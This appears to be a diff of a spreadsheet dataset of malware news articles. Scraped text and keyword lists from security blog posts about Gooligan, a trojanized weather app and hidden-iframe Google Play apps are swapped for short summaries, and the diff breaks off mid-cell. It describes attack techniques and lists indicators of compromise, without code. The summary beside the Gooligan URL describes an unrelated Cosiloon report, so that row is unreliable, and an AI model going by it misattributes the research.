'infinity', 'global', 'service', 'portal', 'contact', 'sale', 'follow', 'good', 'check', 'point', 'software', 'technology', 'right', 'privacy', 'policy', 'cookie', 'setting', 'late', 'news']</t>
         </is>
       </c>
     </row>
@@ -1409,17 +1264,12 @@
       </c>
       <c r="C38" t="inlineStr">
         <is>
-          <t>demo contact support search menu choose language english english spanish español french français german deutsch italian italiano portuguese português japanese chinese korean taiwan 繁體中文 solutions cases industry organization size hybrid cloud zero trust least privilege developer operations solutions antiransomware sdwan cases come life check points customer stories learn retail financial services federal government state local government healthcare telco service provider education cases come life check points customer stories learn enterprise small medium business cases come life check points customer stories learn platform infinity platform secure network secure cloud secure workspace operations explore infinity platform overview infinity core services infinity portal access infinity portal infinity platform agreement predictable cybersecurity environments platform agreement aipowered prevention learn explore quantum next generation firewall ngfw gateway industryleading powered gateways modern enterprises sdwan software defined wide area networks converging networking policy management manage firewall policy unified platform onpremises cloud networks operational technology internet things autonomous iotot prevention zerotrust profiling virtual patching segmentation remote access secure seamless remote access corporate networks aipowered prevention learn explore cloudguard cloud network industryleading prevention cloudnative firewalls cloud native application protection platform cloud native prevention first code developer centric code application automated application aipowered prevention learn explore harmony email collaboration email including office collaboration apps endpoint comprehensive endpoint protection prevent attacks data compromise mobile complete protection mobile workforce across mobile devices sase unifying optimized internet network connectivity aipowered prevention learn operations managed prevention response service operations service infinty mdrmpr extended prevention response aipowered clouddelivered operations infinity xdrxpr secure automation collaboration automate response playbooks infinity playblocks unified events logs service infinity events cloudbased analysis monitoring reporting powered teammate automated admin incident response copilot threatcloud brain behind check point’s prevention aipowered prevention learn support services assess transform master respond manage support explore assess services cyber risk assessment assess cyber maturity plan actionable goals penetration testing evaluate defenses potential cyber attacks threats controls analysis nist cist analyze technology gaps plan solutions improved intelligence analyzed data cyber threats aiding proactive measures infinity global services learn hackers inside secrets beat game view courses explore transform services deployment optimization strategic deployment refinement optimal protection advanced technical account management proactive service delivered highly skilled cyber professionals lifecycle management services effectively maintain lifecycle products services infinity global services learn hackers inside secrets beat game view courses explore master services certifications accreditations comprehensive cyber training certification programs ciso training globally recognized training chief information officers awareness empower employees cyber skills work home cyber range simulated gamification environment training mind check point cyber awareness programs training infinity global services learn hackers inside secrets beat game view courses explore respond services incident response manage mitigate incidents systematic response services managed detection response prioritize prevention delivering comprehensive operations service digital forensics comprehensive investigation analysis cyber incidents attacks infinity global services learn hackers inside secrets beat game view courses explore manage services mxdr managed siem managed firewalls agent management managed cnapp managed cspm infinity global services learn hackers inside secrets beat game view courses explore support services support programs programs designed help maximize technology utilization check point proactive monitoring infrastructure program offerings contact support learn hackers inside secrets beat game view courses solutions cases hybrid cloud zero trust least privilege developer operations solutions antiransomware sdwan industy retail financial services federal government state local government healthcare telco service provider education organization size enterprise small medium business platform infinity platform platform overview infinity core services infinity portal infinity platform agreement secure network next generation firewall ngfw gateway sdwan policy management operational technology internet things remote access secure cloud cloud network cloud native application protection platform code application secure workspace email collaboration endpoint mobile sase operations managed prevention response service extended prevention response secure automation collaboration unified events logs service powered teammate threatcloud support services assess cyber risk assessment penetration testing controls analysis nist cist intelligence transform deployment optimization advanced technical account management lifecycle management services master certifications accreditations ciso training awareness cyber range mind respond incident response managed detection response digital forensics manage mxdr managed siem managed firewalls agent management managed cnapp managed cspm support support programs check point contact support partners check point partners find partner channel partners technology partners mssp partners cloud azure cloud become partner overview enrolled partners partner portal check point channel grow business sign company company leadership careers investor relations newsroom learn resource center customer stories blog events webinars cyber cyber insights check point research cyber talk executives checkmates community cases come life check points customer stories learn search search menu choose language english english spanish español french français german deutsch italian italiano portuguese português japanese chinese korean taiwan 繁體中文 toggle navigation blog home research million google accounts breached gooligan filter select category research securing cloud harmony company culture innovation customer stories horizon securing network partners connect sase harmony email artificial intelligence infinity global services crypto healthcare harmony sase research november million google accounts breached gooligan check point research team share result hard work done research teams revealed today alarming malware campaign attack campaign named gooligan breached million google accounts number continues rise additional breached devices research exposes malware roots infected devices steals authentication tokens used access data google play gmail google photos google docs suite google drive gooligan variant android malware campaign found researchers snappea last year check point reached google team immediately information campaign researchers working closely google investigate source gooligan campaign “we’re appreciative check point’s research partnership we’ve worked together understand issues” said adrian ludwig google’s director android part ongoing efforts protect users ghost push family malware we’ve taken numerous steps protect users improve android ecosystem overall” click read adrian ludwig’s complete statement gooligan encouraged statement google shared addressing issue chosen join forces continue investigation around gooligan google also stated taking numerous steps including proactively notifying affected accounts revoking affected tokens deploying safetynet improvements protect users apps future following sections provide answers regarding campaign affected gooligan potentially affects devices android jelly bean kitkat lollipop inmarket devices today devices located asia europe research identified tens fake applications infected malware you’ve downloaded apps listed appendix might infected review application list “settings apps” find applications please consider downloading antivirus product check point zonealarm check indeed infected noticed hundreds email addresses associated enterprise accounts worldwide know google account breached check account compromised accessing following site created httpsgooligancheckpointcom account breached following steps required clean installation operating system mobile device required process called “flashing” complex process recommend powering device approaching certified technician mobile service provider request device “reflashed” change google account passwords immediately process android devices become infected found traces gooligan malware code dozens legitimatelooking apps thirdparty android stores stores attractive alternative google play many apps free offer free versions paid apps however stores apps sell aren’t always verified gooliganinfected apps also installed using phishing scams attackers broadcast links infected apps unsuspecting users messaging services gooligan emerge researchers first encountered gooligan’s code malicious snappea last year time malware reported several vendors attributed different malware families like ghostpush monkeytest xinyinhe late malware’s creators gone mostly silent summer malware reappeared complex architecture injects malicious code android system processes change malware works today help finance campaign fraudulent activity malware simulates clicks advertisements provided legitimate networks forces install device attacker paid network apps installed successfully logs collected check point researchers show every gooligan installs least apps fraudulently breached devices million apps since campaign began gooligan work infection begins user downloads installs gooliganinfected vulnerable android device research team found infected apps thirdparty stores could also downloaded android users directly tapping malicious links phishing attack messages infected installed sends data device campaign’s command control server gooligan downloads rootkit server takes advantage multiple android exploits including wellknown vroot cve20136282 towelroot cve20143153 exploits still plague many devices today patches available versions android patches never installed user rooting successful attacker full control device execute privileged commands remotely achieving root access gooligan downloads malicious module server installs infected device module injects code running google play google mobile services mimic user behavior gooligan avoid detection technique first seen mobile malware hummingbad module allows gooligan steal user’s google email account authentication token information install apps google play rate raise reputation install adware generate revenue servers don’t know whether using service malicious send gooligan names apps download google play installed service pays attacker malware leaves positive review high rating google play using content receives server research team able identify several instances activity crossreferencing data breached devices google play reviews another reminder users shouldn’t rely ratings alone decide whether trust examples reviews left users also found attacker’s records victims example fake reviews comments fraudulent applications user discovered different fraudulent apps installed device without knowledge similar hummingbad malware also fakes device identification information imei imsi download twice seeming like installation happening different device thereby doubling potential revenue apps downloaded google play gooligan google authorization tokens google authorization token access google account related services user issued google user successfully logged account authorization token stolen hacker token access google services related user including google play gmail google docs google drive google photos google implemented multiple mechanisms like twofactorauthentication prevent hackers compromising google accounts stolen authorization token bypasses mechanism allows hackers desired access user perceived already logged conclusion gooligan breached million google accounts believe largest google account breach date working google continue investigation encourage android users validate whether accounts breached appendix list fake apps infected gooligan perfect cleaner demo wifi enhancer snake glapevzvh html5 games demm memory booster แข่งรถสุดโหด stopwatch clear ballsmove004 flashlight free memory booste touch beauty demoad small blue point battery monitor 清理大师 mini shadow crush photo tubajyics good memory booster phone booster settingservice wifi master fruit slots system booster dircet browser funny drops puzzle bubblepet paradise light browser clean master youtube downloader kxservice best wallpapers smart touch light advanced smartfolder youtubeplayer beautiful alarm pronclub detecting instrument calculator speed fast cleaner blue point cakesweety pedometer compass lite fingerprint unlock pornclub combrowserprovider assistive touch cademy onekeylock wifi speed minibooster comsoitouch comfabullacoploudcallernameringtone kiss browser weather chrono marker slots mania multifunction flashlight google hoth5games swamm browser billiards tcashdemo sexy wallpaper wifi accelerate simple calculator daily racing talking comexampleddeo test photo qplay virtual music cloud tagged android ghostpush gmail google google account google docs google drive google photos gooligan mobile malware snappea also like research march hidden risks within ethereum’s create2 function guide navigating blockchain oded vanunu dikla barda roman zaikin digital research march february 2024’s wanted malware wordpress websites targeted fresh fakeupdates campaign researchers uncovered campaign fakeupdates also known research march check point research alerts financially motivated magnet goblin group exploits 1day vulnerabilities target publicly facing servers highlights rapid exploitation 1day vulnerabilities actor research february shadowed menace escalation cyber attacks highlights significant increase attacks first month company careers leadership newsroom investor relations merchandise store contact technical resources user center sign advisories wiki categorization wiki expand learn resource center cyber check point research check point blog customer stories product knowledge center support services support center infinity global service portal contact sales north america international contact support north america international follow deserve best ©1994 check point software technologies rights reserved copyright privacy policy cookie settings latest news</t>
+          <t>Doctor Web security researchers found new Trojans incorporated into firmwares of several dozens of Android mobile devices. Found malware programs (Cosiloon malware) are stored in system catalogs and covertly download and install programs.</t>
         </is>
       </c>
       <c r="D38" t="inlineStr">
         <is>
           <t>https://blog.checkpoint.com/2016/11/30/1-million-google-accounts-breached-gooligan/</t>
-        </is>
-      </c>
-      <c r="E38" t="inlineStr">
-        <is>
-          <t>['contact', 'support', 'search', 'menu', 'language', 'italian', 'portuguese', 'solution', 'case', 'industry', 'organization', 'size', 'hybrid', 'cloud', 'trust', 'least', 'privilege', 'developer', 'operation', 'solution', 'case', 'life', 'check', 'point', 'customer', 'story', 'retail', 'financial', 'service', 'federal', 'government', 'state', 'local', 'government', 'service', 'provider', 'education', 'case', 'life', 'check', 'point', 'customer', 'story', 'enterprise', 'small', 'medium', 'business', 'case', 'life', 'check', 'point', 'customer', 'story', 'platform', 'infinity', 'platform', 'secure', 'network', 'secure', 'cloud', 'secure', 'workspace', 'operation', 'infinity', 'platform', 'overview', 'infinity', 'core', 'service', 'portal', 'access', 'infinity', 'portal', 'infinity', 'platform', 'agreement', 'predictable', 'cybersecurity', 'environment', 'platform', 'agreement', 'prevention', 'quantum', 'next', 'generation', 'firewall', 'gateway', 'gateway', 'modern', 'enterprise', 'wide', 'area', 'network', 'policy', 'management', 'firewall', 'policy', 'platform', 'operational', 'technology', 'internet', 'thing', 'autonomous', 'iotot', 'prevention', 'zerotrust', 'virtual', 'segmentation', 'remote', 'access', 'secure', 'seamless', 'remote', 'access', 'corporate', 'network', 'prevention', 'prevention', 'cloudnative', 'firewall', 'native', 'application', 'protection', 'platform', 'code', 'developer', 'code', 'application', 'application', 'prevention', 'harmony', 'email', 'collaboration', 'email', 'office', 'collaboration', 'app', 'comprehensive', 'endpoint', 'protection', 'prevent', 'attack', 'datum', 'compromise', 'mobile', 'complete', 'protection', 'mobile', 'workforce', 'mobile', 'device', 'sase', 'unifying', 'internet', 'network', 'connectivity', 'prevention', 'operation', 'prevention', 'response', 'service', 'operation', 'service', 'prevention', 'response', 'clouddelivered', 'operation', 'infinity', 'automation', 'collaboration', 'automate', 'response', 'playbook', 'infinity', 'playblock', 'event', 'log', 'service', 'infinity', 'event', 'analysis', 'monitoring', 'teammate', 'check', 'point', 'prevention', 'prevention', 'support', 'service', 'master', 'manage', 'support', 'assess', 'service', 'cyber', 'risk', 'assessment', 'cyber', 'maturity', 'plan', 'actionable', 'goal', 'penetration', 'testing', 'defense', 'potential', 'cyber', 'attack', 'threat', 'analysis', 'nist', 'cist', 'technology', 'gap', 'solution', 'intelligence', 'datum', 'cyber', 'threat', 'proactive', 'measure', 'infinity', 'global', 'service', 'hacker', 'secret', 'game', 'view', 'course', 'transform', 'service', 'deployment', 'optimization', 'strategic', 'deployment', 'refinement', 'optimal', 'protection', 'technical', 'proactive', 'service', 'skilled', 'cyber', 'professional', 'management', 'service', 'lifecycle', 'product', 'service', 'global', 'service', 'hacker', 'secret', 'game', 'view', 'course', 'master', 'service', 'certification', 'accreditation', 'comprehensive', 'cyber', 'training', 'certification', 'program', 'ciso', 'training', 'training', 'chief', 'information', 'officer', 'awareness', 'empow', 'employee', 'cyber', 'skill', 'cyber', 'gamification', 'environment', 'training', 'mind', 'check', 'point', 'cyber', 'awareness', 'program', 'infinity', 'global', 'service', 'hacker', 'secret', 'game', 'view', 'course', 'respond', 'service', 'incident', 'response', 'mitigate', 'incident', 'systematic', 'response', 'service', 'detection', 'response', 'prioritize', 'prevention', 'comprehensive', 'operation', 'service', 'digital', 'forensic', 'comprehensive', 'investigation', 'analysis', 'cyber', 'incident', 'attack', 'global', 'service', 'hacker', 'secret', 'game', 'view', 'course', 'manage', 'service', 'mxdr', 'siem', 'firewall', 'agent', 'management', 'global', 'service', 'hacker', 'secret', 'game', 'view', 'course', 'support', 'service', 'support', 'program', 'program', 'help', 'technology', 'utilization', 'check', 'point', 'proactive', 'monitoring', 'infrastructure', 'program', 'offering', 'contact', 'support', 'hacker', 'secret', 'game', 'view', 'course', 'solution', 'case', 'hybrid', 'cloud', 'trust', 'least', 'privilege', 'developer', 'operation', 'solution', 'financial', 'service', 'federal', 'government', 'state', 'local', 'government', 'service', 'provider', 'education', 'organization', 'size', 'enterprise', 'small', 'medium', 'business', 'platform', 'infinity', 'platform', 'platform', 'overview', 'infinity', 'core', 'service', 'infinity', 'portal', 'infinity', 'platform', 'agreement', 'secure', 'network', 'next', 'generation', 'firewall', 'gateway', 'policy', 'management', 'operational', 'technology', 'internet', 'thing', 'remote', 'access', 'secure', 'application', 'platform', 'code', 'application', 'secure', 'workspace', 'email', 'collaboration', 'endpoint', 'operation', 'prevention', 'response', 'service', 'prevention', 'response', 'automation', 'collaboration', 'event', 'log', 'service', 'teammate', 'service', 'cyber', 'risk', 'assessment', 'penetration', 'testing', 'analysis', 'nist', 'cist', 'intelligence', 'deployment', 'optimization', 'advanced', 'technical', 'account', 'management', 'service', 'master', 'certification', 'accreditation', 'ciso', 'awareness', 'cyber', 'range', 'mind', 'incident', 'response', 'detection', 'response', 'digital', 'forensic', 'mxdr', 'firewall', 'agent', 'management', 'support', 'support', 'program', 'point', 'contact', 'support', 'partner', 'point', 'partner', 'partner', 'channel', 'partner', 'technology', 'partner', 'partner', 'overview', 'partner', 'partner', 'portal', 'check', 'point', 'channel', 'business', 'sign', 'company', 'company', 'leadership', 'career', 'investor', 'relation', 'newsroom', 'resource', 'center', 'customer', 'story', 'blog', 'event', 'cyber', 'cyber', 'insight', 'point', 'research', 'cyber', 'talk', 'executive', 'community', 'case', 'life', 'check', 'point', 'customer', 'story', 'search', 'search', 'menu', 'language', 'italian', 'portuguese', 'blog', 'home', 'research', 'account', 'filter', 'select', 'category', 'research', 'company', 'innovation', 'customer', 'story', 'network', 'partner', 'sase', 'harmony', 'email', 'artificial', 'intelligence', 'infinity', 'global', 'service', 'account', 'check', 'point', 'research', 'team', 'share', 'result', 'hard', 'work', 'research', 'team', 'today', 'malware', 'campaign', 'attack', 'campaign', 'account', 'number', 'additional', 'breached', 'device', 'research', 'malware', 'root', 'device', 'authentication', 'token', 'access', 'datum', 'google', 'play', 'gmail', 'photo', 'variant', 'researcher', 'last', 'year', 'check', 'point', 'team', 'information', 'campaign', 'researcher', 'source', 'campaign', 'appreciative', 'check', 'point', 'research', 'partnership', 'issue', 'director', 'part', 'ongoing', 'effort', 'user', 'ghost', 'family', 'malware', 'numerous', 'step', 'user', 'ecosystem', 'click', 'complete', 'statement', 'issue', 'join', 'force', 'investigation', 'numerous', 'step', 'affected', 'account', 'token', 'safetynet', 'improvement', 'user', 'app', 'future', 'section', 'answer', 'campaign', 'device', 'inmarket', 'device', 'today', 'device', 'ten', 'fake', 'application', 'malware', 'app', 'appendix', 'review', 'application', 'list', 'setting', 'app', 'application', 'antivirus', 'product', 'check', 'point', 'check', 'hundred', 'email', 'address', 'enterprise', 'account', 'check', 'account', 'site', 'step', 'clean', 'installation', 'operating', 'system', 'mobile', 'device', 'process', 'complex', 'process', 'device', 'technician', 'mobile', 'service', 'provider', 'request', 'device', 'reflashed', 'change', 'account', 'password', 'device', 'dozen', 'app', 'android', 'store', 'store', 'attractive', 'alternative', 'google', 'many', 'app', 'free', 'free', 'version', 'app', 'store', 'app', 'app', 'phishing', 'scam', 'attacker', 'broadcast', 'link', 'app', 'user', 'service', 'researcher', 'malicious', 'snappea', 'last', 'year', 'time', 'several', 'vendor', 'different', 'malware', 'family', 'xinyinhe', 'creator', 'silent', 'summer', 'malware', 'complex', 'architecture', 'malicious', 'code', 'android', 'system', 'process', 'change', 'malware', 'work', 'today', 'finance', 'campaign', 'fraudulent', 'activity', 'malware', 'click', 'advertisement', 'legitimate', 'network', 'force', 'device', 'attacker', 'network', 'app', 'check', 'point', 'researcher', 'install', 'least', 'app', 'device', 'app', 'campaign', 'work', 'infection', 'user', 'download', 'install', 'vulnerable', 'device', 'research', 'team', 'infected', 'app', 'thirdparty', 'store', 'user', 'malicious', 'link', 'attack', 'message', 'data', 'device', 'campaign', 'command', 'rootkit', 'server', 'advantage', 'multiple', 'android', 'exploit', 'exploit', 'many', 'device', 'today', 'available', 'version', 'patch', 'user', 'successful', 'attacker', 'full', 'control', 'device', 'privileged', 'command', 'root', 'access', 'malicious', 'module', 'server', 'device', 'module', 'code', 'service', 'user', 'behavior', 'detection', 'technique', 'mobile', 'module', 'user', 'email', 'account', 'authentication', 'token', 'information', 'install', 'app', 'google', 'play', 'rate', 'raise', 'reputation', 'adware', 'revenue', 'server', 'service', 'malicious', 'name', 'app', 'play', 'service', 'attacker', 'positive', 'review', 'high', 'rating', 'google', 'play', 'content', 'server', 'research', 'team', 'able', 'several', 'instance', 'activity', 'datum', 'breached', 'device', 'play', 'review', 'reminder', 'user', 'rating', 'trust', 'example', 'review', 'user', 'attacker', 'record', 'victim', 'fake', 'review', 'fraudulent', 'application', 'user', 'different', 'fraudulent', 'app', 'device', 'knowledge', 'similar', 'hummingbad', 'malware', 'device', 'identification', 'information', 'installation', 'different', 'device', 'potential', 'revenue', 'app', 'token', 'account', 'service', 'user', 'user', 'account', 'authorization', 'token', 'hacker', 'service', 'user', 'gmail', 'photo', 'multiple', 'mechanism', 'twofactorauthentication', 'hacker', 'account', 'authorization', 'token', 'bypass', 'mechanism', 'hacker', 'access', 'user', 'conclusion', 'account', 'large', 'account', 'date', 'investigation', 'user', 'account', 'appendix', 'list', 'fake', 'app', 'perfect', 'clean', 'demo', 'wifi', 'enhancer', 'snake', 'glapevzvh', 'game', 'memory', 'booster', 'flashlight', 'free', 'memory', 'booste', 'touch', 'beauty', 'demoad', 'small', 'blue', 'point', 'battery', 'monitor', 'shadow', 'crush', 'photo', 'good', 'memory', 'booster', 'phone', 'booster', 'settingservice', 'wifi', 'master', 'fruit', 'slot', 'system', 'booster', 'downloader', 'kxservice', 'good', 'wallpaper', 'smart', 'touch', 'light', 'advanced', 'smartfolder', 'beautiful', 'alarm', 'pronclub', 'instrument', 'calculator', 'clean', 'blue', 'point', 'cakesweety', 'pedometer', 'compass', 'lite', 'fingerprint', 'unlock', 'pornclub', 'combrowserprovider', 'assistive', 'touch', 'cademy', 'wifi', 'speed', 'minibooster', 'marker', 'mania', 'multifunction', 'flashlight', 'sexy', 'wallpaper', 'wifi', 'simple', 'calculator', 'racing', 'comexampleddeo', 'test', 'photo', 'qplay', 'virtual', 'music', 'cloud', 'gmail', 'photo', 'research', 'risk', 'ethereum', 'create2', 'function', 'guide', 'digital', 'malware', 'website', 'fresh', 'fakeupdate', 'campaign', 'researcher', 'campaign', 'fakeupdate', 'research', 'check', 'point', 'research', 'motivated', 'magnet', 'group', 'vulnerability', 'target', 'server', 'rapid', 'exploitation', 'actor', 'research', 'menace', 'escalation', 'cyber', 'attack', 'significant', 'increase', 'attack', 'first', 'month', 'company', 'career', 'leadership', 'newsroom', 'investor', 'relation', 'merchandise', 'store', 'contact', 'technical', 'resource', 'user', 'center', 'sign', 'advisory', 'wiki', 'categorization', 'wiki', 'resource', 'center', 'cyber', 'check', 'point', 'research', 'check', 'point', 'blog', 'customer', 'story', 'product', 'knowledge', 'center', 'support', 'service', 'support', 'center', 'infinity', 'global', 'service', 'portal', 'contact', 'sale', 'follow', 'good', 'check', 'point', 'software', 'technology', 'right', 'privacy', 'policy', 'cookie', 'setting', 'late', 'news']</t>
         </is>
       </c>
     </row>
@@ -1436,17 +1286,12 @@
       </c>
       <c r="C39" t="inlineStr">
         <is>
-          <t>awardwinning news views insight eset community english español deutsch português français tips advice business eset research eset research blogposts podcasts white papers reports featured ukraine crisis digital resource center live progress covid19 resources videos topics digital scams privacy cybercrime kids online social media internet things malware ransomware secure coding mobile critical infrastructure research welivesecurity experts contact english español deutsch português français awardwinning news views insight eset community eset research sunny chance stolen credentials malicious weather found google play eset spotted banking malware google play disguised weather forecast steals banking credentials locks screens lukas stefanko read android users target banking malware screen locking capabilities disguised weather forecast google play detected eset trojanandroidspybankerhu malware trojanized version otherwise benign weather forecast application good weather malicious managed around google’s mechanisms appeared store february reported eset days later consequently pulled store short lifetime found devices users besides weather forecast functionalities adopted original legitimate application trojan able lock unlock infected devices remotely intercept text messages apart trojan targeted users turkish mobile banking apps whose credentials harvested using phony login forms figure trojanized good weather google play figure malicious description found google play operate installed unsuspecting user weatherthemed icon disappears infected device displays fake system screen requesting device administrator rights behalf fictitious “system update” enabling rights victim allows malware change screenunlock password lock screen figure green legitimate good weather icon malicious version figure fake “system update” demanding device administrator rights together permission intercept text messages obtained installation trojan start malicious activity users alarmed point might pleased weather widget home screens however background malware getting work sharing device information server depending command gets return intercept received text messages send server remotely lock unlock device setting lock screen password attackers’ choice harvest banking credentials trojan displays fake login screen user runs targeted banking apps sends entered data attacker thanks permission intercept victims’ text messages malware also able bypass smsbased twofactor authentication device locking suspect function enters picture cashing compromised bank account keep fraudulent activity hidden user locked victims wait malware receives command unlock device device infected clean you’ve recently installed weather play store might want check haven’t victims banking trojan case think might downloaded named good weather check icon apps yellow icon safe can’t find icon works widget search settings application manger find blue icon application manager depicted downloaded malicious good weather imitation clean device turn renowned mobile solution eset mobile remove malware manually manually uninstall trojan first necessary deactivate device administrator rights found settings system update done uninstall malicious settings application manger good weather figure malware disguised system update active device administrators figure trojan application manager stay safe since trojanized version already pulled store safe download good weather originally delivered google play developer asdtm however malicious fakes legitimate apps continue infiltrate play store it’s good stick basic principles keep encountering firsthand although flawless google play employ advanced mechanisms keep malware case alternative stores unknown sources official google play store whenever possible downloading play store make sure know permissions installing updating instead automatically giving permissions demands consider mean well device anything seems line read users write reviews rethink downloading accordingly running anything you’ve installed mobile device keep paying attention permissions rights requests won’t without advanced permissions aren’t connected intended function might don’t want installed phone last least even else fails reputable mobile solution protect device active threats you’d like find androidbased malware look latest research topic you’re also welcome stop eset’s stand year’s mobile world congress analyzed samples indicators compromise iocs package name hash detection goodishweather a69c9bad3db04d106d92fd82ef4503ea012d0da9 androidspybankerhu targeted applications comgaranticepsubesi comgaranticepbank compozitroniscep comsofttechisbankasi comteb comakbankandroidappsakbankdirekt comakbanksoftotp comakbankandroidappsakbankdirekttablet comykbandroidtablet comykbandroidmobilonay comfinansbankmobilecepsube finansbankenpara comtmobtechhalkbank bizmobinexandroidappscepsifrematik comvakifbankmobile comingbanktringmobil comtmobdenizbank trcomsekerbilisimmbank comziraatziraatmobil comintertechmobilemoneytransferactivity comkuveytturkmobil commagiclickodeabank keep date sign newsletters ukraine crisis newsletter regular weekly newsletter subscribe related articles eset research rescoms rides waves acecryptor spam eset research rescoms rides waves acecryptor spam eset research evasive panda leverages monlam festival target tibetans eset research evasive panda leverages monlam festival target tibetans eset research ukraine crisis digital resource center operation texonto information operation targeting ukrainian speakers context eset research ukraine crisis digital resource center operation texonto information operation targeting ukrainian speakers context share article discussion awardwinning news views insight eset community eset contact privacy policy legal information manage cookies feed copyright eset rights reserved</t>
+          <t>Banking malware known as the BankBot trojan was identified within an app on the Google Play Store.</t>
         </is>
       </c>
       <c r="D39" t="inlineStr">
         <is>
           <t>https://www.welivesecurity.com/2017/02/22/sunny-chance-stolen-credentials-malicious-weather-app-found-google-play/</t>
-        </is>
-      </c>
-      <c r="E39" t="inlineStr">
-        <is>
-          <t>['news', 'view', 'insight', 'advice', 'business', 'research', 'blogpost', 'podcast', 'white', 'paper', 'report', 'crisis', 'digital', 'resource', 'center', 'live', 'progress', 'covid19', 'resource', 'video', 'digital', 'cybercrime', 'online', 'social', 'medium', 'internet', 'thing', 'malware', 'ransomware', 'mobile', 'critical', 'infrastructure', 'research', 'welivesecurity', 'expert', 'contact', 'news', 'view', 'insight', 'research', 'sunny', 'chance', 'credential', 'malicious', 'weather', 'banking', 'play', 'disguised', 'weather', 'forecast', 'banking', 'credential', 'screen', 'user', 'banking', 'malware', 'screen', 'locking', 'capability', 'weather', 'forecast', 'play', 'version', 'benign', 'weather', 'forecast', 'application', 'good', 'weather', 'malicious', 'mechanism', 'store', 'eset', 'day', 'store', 'short', 'lifetime', 'device', 'user', 'forecast', 'functionality', 'original', 'legitimate', 'application', 'trojan', 'able', 'unlock', 'infected', 'device', 'text', 'message', 'user', 'turkish', 'mobile', 'banking', 'app', 'credential', 'phony', 'login', 'form', 'figure', 'good', 'weather', 'play', 'figure', 'malicious', 'description', 'play', 'unsuspecting', 'user', 'weatherthemed', 'icon', 'device', 'fake', 'system', 'screen', 'device', 'administrator', 'right', 'behalf', 'fictitious', 'system', 'update', 'right', 'victim', 'malware', 'screenunlock', 'password', 'lock', 'screen', 'figure', 'green', 'legitimate', 'good', 'weather', 'icon', 'malicious', 'version', 'figure', 'fake', 'system', 'update', 'device', 'administrator', 'right', 'permission', 'intercept', 'text', 'message', 'installation', 'malicious', 'activity', 'user', 'point', 'weather', 'widget', 'home', 'screen', 'background', 'work', 'device', 'information', 'server', 'command', 'return', 'intercept', 'text', 'message', 'server', 'unlock', 'device', 'lock', 'screen', 'password', 'attacker', 'choice', 'harvest', 'banking', 'credential', 'fake', 'login', 'screen', 'user', 'banking', 'app', 'datum', 'attacker', 'thank', 'permission', 'intercept', 'victim', 'text', 'message', 'malware', 'able', 'bypass', 'twofactor', 'authentication', 'device', 'suspect', 'function', 'picture', 'bank', 'account', 'fraudulent', 'activity', 'user', 'victim', 'malware', 'command', 'unlock', 'device', 'device', 'clean', 'weather', 'play', 'store', 'victim', 'banking', 'case', 'good', 'weather', 'icon', 'app', 'icon', 'safe', 'icon', 'work', 'widget', 'search', 'setting', 'application', 'manger', 'blue', 'icon', 'application', 'manager', 'malicious', 'good', 'weather', 'imitation', 'clean', 'device', 'renowned', 'mobile', 'solution', 'eset', 'mobile', 'necessary', 'device', 'administrator', 'right', 'setting', 'system', 'uninstall', 'malicious', 'setting', 'application', 'manger', 'good', 'weather', 'figure', 'system', 'active', 'device', 'administrator', 'application', 'manager', 'safe', 'version', 'store', 'safe', 'download', 'good', 'weather', 'play', 'developer', 'malicious', 'fake', 'legitimate', 'app', 'play', 'store', 'good', 'stick', 'basic', 'principle', 'flawless', 'google', 'play', 'advanced', 'mechanism', 'malware', 'case', 'alternative', 'store', 'unknown', 'source', 'official', 'google', 'play', 'store', 'possible', 'play', 'store', 'sure', 'permission', 'permission', 'demand', 'device', 'line', 'user', 'review', 'mobile', 'device', 'attention', 'permission', 'right', 'request', 'advanced', 'permission', 'function', 'phone', 'least', 'reputable', 'mobile', 'solution', 'device', 'active', 'threat', 'androidbased', 'malware', 'late', 'research', 'topic', 'welcome', 'stand', 'year', 'mobile', 'world', 'sample', 'indicator', 'compromise', 'package', 'name', 'hash', 'detection', 'goodishweather', 'application', 'comintertechmobilemoneytransferactivity', 'commagiclickodeabank', 'keep', 'date', 'newsletter', 'regular', 'weekly', 'newsletter', 'subscribe', 'article', 'research', 'rescom', 'ride', 'wave', 'rescom', 'ride', 'wave', 'evasive', 'panda', 'leverage', 'research', 'evasive', 'panda', 'leverage', 'crisis', 'digital', 'resource', 'operation', 'ukrainian', 'speaker', 'context', 'crisis', 'digital', 'resource', 'operation', 'ukrainian', 'speaker', 'context', 'share', 'article', 'discussion', 'news', 'view', 'insight', 'privacy', 'policy', 'legal', 'information', 'cookie', 'right']</t>
         </is>
       </c>
     </row>
@@ -1463,17 +1308,12 @@
       </c>
       <c r="C40" t="inlineStr">
         <is>
-          <t>menu tools atoms consulting attack google play apps infected malicious iframes people reacted read share xiao zhang wenjun shawn march category malware unit tags android google play iframes mobile mobile networks operators service providers research post also available japanese recently discovered android apps google play infected tiny hidden iframes link malicious domains local html pages popular installs alone investigation indicates developers infected apps blame likely victims believe likely developers’ development platforms infected malware searches html pages injects malicious content html pages finds case another situation mobile malware originated infected development platforms without developers’ awareness reported findings google team infected apps removed google play figure subset infected samples google play infected apps observed included apps design ideas ranging cheesecake gardening coffee tables shown figure apps common employ android webview display static html pages first glance page nothing loading locally stored pictures show hardcoded text however deep analysis actual html code reveals tiny hidden iframe links wellknown malicious domains although linked domains time investigation fact many apps google play infected notable notable infected pages also attempts download install malicious microsoft windows executable file time page loading device running windows execute behavior fits well nonandroid category recently released google android according classification nonandroid refers apps unable cause harm user android device contains components potentially harmful platforms infection works infected apps currently require internet permission equipped activities load interstitial advertisements load main latter instantiates android webview component displays local html page figure webview component javascriptinterface enabled functionality isn’t used samples we’ve examined enables loaded javascript code access app’s native functionality figure example infected sample’s underlying code html page displays pictures text however html page tiny hidden iframe component added observed techniques used hide iframe make iframe tiny setting height width 1pixel display attribute iframe specification none finally evade detection based simple string matching source urls obfuscated using html number codes examples shown figure browser automatically performs following conversions ‘46’ ‘105’ ‘117’ figure techniques observed infected samples hide iframe region eventually iframe sources converge domains wwwbrenzplrc jlchuraplrc polish cert certpl took domains directed sinkhole server prevent harming users figure given domains hosting malware time investigation notorious history figure malicious domains current resolve sinkhole server investigation also identified sample didn’t contain infected iframe entire vbscript injected html figure script contained base64 encoded windows executable windows system script would decode write file system execute since vbscript proprietary microsoft windows scripting language script inert execute android platform piece code cause damage android users first code appended outside html makes illegal html page browsers always attempted render pretty much anything whether malformed order make creating html pages difficult people might understand standard completely wildfire detects several malicious behaviors within dropped file including modify network hosts file modify windows firewall settings inject code another process copy figure infected sample attempts drop window executable file origin infection infected apps discovered belong seven different unrelated developers geographical connection among seven different developers seven connections indonesia straightforward clue comes name significant number discovered samples word “indonesia” names moreover developer’s website links personal blog page written indonesian 